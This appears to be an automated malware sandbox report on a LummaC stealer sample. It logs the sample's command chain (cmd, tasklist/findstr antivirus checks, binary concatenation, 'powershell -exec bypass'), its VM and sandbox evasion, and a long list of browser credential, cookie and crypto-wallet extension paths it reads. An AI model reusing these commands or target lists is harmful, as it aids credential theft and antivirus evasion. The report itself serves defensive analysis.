      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Query firmware table information (likely to detect VMs)
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2562Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 975Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.com TID: 6260Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.com TID: 3612Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep count: 2562 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep count: 975 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7076Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\405361\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\405361Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Meta Meta.cmd & Meta.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 405361Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Supervisors" Relaxation Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Singh + ..\Adaptation + ..\Pokemon + ..\Unified + ..\Failure + ..\Ups + ..\Related WJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\405361\Weapons.com Weapons.com WJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="mwmhbevhkrq1irhqgoe4vxmfc6dy0_vvbg29zzmfnnw-1734715075-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="mwmhbevhkrq1irhqgoe4vxmfc6dy0_vvbg29zzmfnnw-1734715075-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <Jump to behavior
      Source: Weapons.com, 0000000A.00000000.1760418970.0000000000B93000.00000002.00000001.01000000.00000006.sdmp, Algeria.0.dr, Weapons.com.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
